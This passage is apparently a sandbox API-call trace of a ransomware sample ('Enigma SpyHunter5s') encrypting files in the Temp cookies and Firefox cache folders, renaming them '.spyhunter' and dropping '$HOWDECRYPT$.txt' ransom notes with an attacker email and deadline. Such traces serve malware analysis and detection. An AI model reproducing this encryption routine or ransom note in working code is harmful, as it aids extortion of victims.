CloseHandle (hObject=0x178) returned 1 [0153.049] GetProcessHeap () returned 0x2c0000 [0153.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.049] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\e9RSC31dSb.m4a.spyhunter") returned 77 [0153.049] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\e9RSC31dSb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\e9rsc31dsb.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\e9RSC31dSb.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\e9rsc31dsb.m4a.spyhunter")) returned 1 [0153.050] GetProcessHeap () returned 0x2c0000 [0153.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.051] GetProcessHeap () returned 0x2c0000 [0153.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0153.051] GetProcessHeap () returned 0x2c0000 [0153.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08548 | out: hHeap=0x2c0000) returned 1 [0153.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0153.052] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0153.052] WriteFile (in: hFile=0x178, lpBuffer=0x248ec8f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248edb8, lpOverlapped=0x0 | out: lpBuffer=0x248ec8f*, lpNumberOfBytesWritten=0x248edb8*=0x127, lpOverlapped=0x0) returned 1 [0153.053] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0153.053] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248edb8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248edb8*=0x2ac, lpOverlapped=0x0) returned 1 [0153.053] CloseHandle (hObject=0x178) returned 1 [0153.053] GetProcessHeap () returned 0x2c0000 [0153.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ead8 | out: hHeap=0x2c0000) returned 1 [0153.054] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed58 | out: pbBuffer=0x248ed58) returned 1 [0153.054] GetProcessHeap () returned 0x2c0000 [0153.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0153.054] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed50*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed50*=0x30) returned 1 [0153.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0153.055] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat") returned 70 [0153.055] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0153.055] GetProcessHeap () returned 0x2c0000 [0153.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0153.055] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ed14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ed14*=0x2800, lpOverlapped=0x0) returned 1 [0153.420] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.420] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ed14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ed14*=0x2800, lpOverlapped=0x0) returned 1 [0153.420] GetProcessHeap () returned 0x2c0000 [0153.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0153.420] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.421] WriteFile (in: hFile=0x178, lpBuffer=0x248ed54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ed14, lpOverlapped=0x0 | out: lpBuffer=0x248ed54*, lpNumberOfBytesWritten=0x248ed14*=0x4, lpOverlapped=0x0) returned 1 [0153.421] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ed14, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ed14*=0x30, lpOverlapped=0x0) returned 1 [0153.421] CloseHandle (hObject=0x178) returned 1 [0153.819] GetProcessHeap () returned 0x2c0000 [0153.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.819] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat.spyhunter") returned 80 [0153.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\index.dat.spyhunter")) returned 1 [0153.821] GetProcessHeap () returned 0x2c0000 [0153.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.821] GetProcessHeap () returned 0x2c0000 [0153.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0153.821] GetProcessHeap () returned 0x2c0000 [0153.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80bf8 | out: hHeap=0x2c0000) returned 1 [0153.821] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed50 | out: pbBuffer=0x248ed50) returned 1 [0153.821] GetProcessHeap () returned 0x2c0000 [0153.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0153.821] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed48*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed48*=0x30) returned 1 [0153.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0153.823] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_") returned 107 [0153.823] StrStrW (lpFirst="_CACHE_002_", lpSrch=".txt") returned 0x0 [0153.823] GetProcessHeap () returned 0x2c0000 [0153.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0153.823] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ed0c*=0x2800, lpOverlapped=0x0) returned 1 [0153.945] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.945] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ed0c*=0x2800, lpOverlapped=0x0) returned 1 [0153.945] GetProcessHeap () returned 0x2c0000 [0153.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0153.945] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.945] WriteFile (in: hFile=0x178, lpBuffer=0x248ed4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ed0c, lpOverlapped=0x0 | out: lpBuffer=0x248ed4c*, lpNumberOfBytesWritten=0x248ed0c*=0x4, lpOverlapped=0x0) returned 1 [0155.251] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ed0c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ed0c*=0x30, lpOverlapped=0x0) returned 1 [0155.251] CloseHandle (hObject=0x178) returned 1 [0155.258] GetProcessHeap () returned 0x2c0000 [0155.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.258] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_.spyhunter") returned 117 [0155.258] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_.spyhunter")) returned 1 [0155.259] GetProcessHeap () returned 0x2c0000 [0155.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.259] GetProcessHeap () returned 0x2c0000 [0155.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0155.259] GetProcessHeap () returned 0x2c0000 [0155.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbd898 | out: hHeap=0x2c0000) returned 1 [0155.259] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0155.260] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.260] WriteFile (in: hFile=0x178, lpBuffer=0x248ec83*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248edac, lpOverlapped=0x0 | out: lpBuffer=0x248ec83*, lpNumberOfBytesWritten=0x248edac*=0x127, lpOverlapped=0x0) returned 1 [0155.261] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.261] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248edac, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248edac*=0x2ac, lpOverlapped=0x0) returned 1 [0155.261] CloseHandle (hObject=0x178) returned 1 [0155.261] GetProcessHeap () returned 0x2c0000 [0155.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc2090 | out: hHeap=0x2c0000) returned 1 [0155.261] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed48 | out: pbBuffer=0x248ed48) returned 1 [0155.261] GetProcessHeap () returned 0x2c0000 [0155.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0155.261] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed40*=0x30) returned 1 [0155.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0155.262] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01") returned 109 [0155.262] StrStrW (lpFirst="24B53d01", lpSrch=".txt") returned 0x0 [0155.262] GetProcessHeap () returned 0x2c0000 [0155.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0155.262] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ed04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ed04*=0x2800, lpOverlapped=0x0) returned 1 [0155.308] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.308] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ed04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ed04*=0x2800, lpOverlapped=0x0) returned 1 [0155.308] GetProcessHeap () returned 0x2c0000 [0155.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0155.308] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.308] WriteFile (in: hFile=0x178, lpBuffer=0x248ed44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ed04, lpOverlapped=0x0 | out: lpBuffer=0x248ed44*, lpNumberOfBytesWritten=0x248ed04*=0x4, lpOverlapped=0x0) returned 1 [0155.594] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ed04, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ed04*=0x30, lpOverlapped=0x0) returned 1 [0155.594] CloseHandle (hObject=0x178) returned 1 [0155.603] GetProcessHeap () returned 0x2c0000 [0155.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.603] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01.spyhunter") returned 119 [0155.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01.spyhunter")) returned 1 [0155.604] GetProcessHeap () returned 0x2c0000 [0155.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.604] GetProcessHeap () returned 0x2c0000 [0155.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0155.605] GetProcessHeap () returned 0x2c0000 [0155.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbcf58 | out: hHeap=0x2c0000) returned 1 [0155.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0155.605] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.606] WriteFile (in: hFile=0x178, lpBuffer=0x248ec7b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248eda4, lpOverlapped=0x0 | out: lpBuffer=0x248ec7b*, lpNumberOfBytesWritten=0x248eda4*=0x127, lpOverlapped=0x0) returned 1 [0155.606] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.606] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248eda4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248eda4*=0x2ac, lpOverlapped=0x0) returned 1 [0155.606] CloseHandle (hObject=0x178) returned 1 [0155.607] GetProcessHeap () returned 0x2c0000 [0155.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f481e0 | out: hHeap=0x2c0000) returned 1 [0155.607] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed40 | out: pbBuffer=0x248ed40) returned 1 [0155.607] GetProcessHeap () returned 0x2c0000 [0155.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0155.607] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed38*=0x30) returned 1 [0155.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0155.608] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01") returned 109 [0155.608] StrStrW (lpFirst="FCBF5d01", lpSrch=".txt") returned 0x0 [0155.608] GetProcessHeap () returned 0x2c0000 [0155.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0155.608] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ecfc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ecfc*=0x2800, lpOverlapped=0x0) returned 1 [0155.640] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.640] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ecfc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ecfc*=0x2800, lpOverlapped=0x0) returned 1 [0155.640] GetProcessHeap () returned 0x2c0000 [0155.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0155.640] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.640] WriteFile (in: hFile=0x178, lpBuffer=0x248ed3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ecfc, lpOverlapped=0x0 | out: lpBuffer=0x248ed3c*, lpNumberOfBytesWritten=0x248ecfc*=0x4, lpOverlapped=0x0) returned 1 [0155.854] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ecfc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ecfc*=0x30, lpOverlapped=0x0) returned 1 [0155.855] CloseHandle (hObject=0x178) returned 1 [0155.855] GetProcessHeap () returned 0x2c0000 [0155.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.855] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01.spyhunter") returned 119 [0155.855] MoveFileW 